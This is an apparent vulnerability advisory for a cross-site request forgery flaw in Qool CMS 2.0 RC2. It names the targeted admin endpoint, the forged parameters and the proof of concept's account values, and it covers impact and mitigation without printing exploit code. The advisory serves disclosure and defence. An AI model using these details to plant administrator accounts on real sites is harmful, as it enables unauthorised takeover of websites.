CVE-2013-20005

Vulnerability

Overview

Qool CMS 2.0 RC2 is vulnerable to cross-site request forgery (CSRF) because it does not perform any validity checks on HTTP requests to the /admin/adduser endpoint. An attacker can craft a malicious HTML page that, when visited by an authenticated administrator, automatically submits a forged POST request containing parameters such as username, password, email, and level to create a new user account with root-level privileges (level 1) [1][2].

Exploitation

Exploitation requires no authentication on the attacker's part; the attack relies on social engineering to lure a logged-in administrator to a malicious web page. The proof-of-concept exploit, published in the Exploit Database, demonstrates a simple HTML form that auto-submits to the vulnerable endpoint, creating a user named "qoolio" with a password of "pass251" and root-level access [2]. The attack is trivial to execute and does not require any special network position beyond the ability to host a web page or send a crafted link.

Impact

Successful exploitation grants the attacker a fully privileged root-level account on the Qool CMS instance. With this account, the attacker can perform any administrative action, including modifying site content, managing users, and potentially executing code through the CMS's extension system. The vulnerability effectively compromises the entire CMS installation [1][3].

Mitigation

As of the advisory publication date (March 2013), no patch was available from the vendor. The affected version is Qool CMS 2.0 RC2, which may be end-of-life. Administrators should restrict access to the admin panel, implement additional authentication layers (e.g., HTTP basic auth), or migrate to a supported CMS. The vulnerability is not currently listed on CISA's Known Exploited Vulnerabilities (KEV) catalog.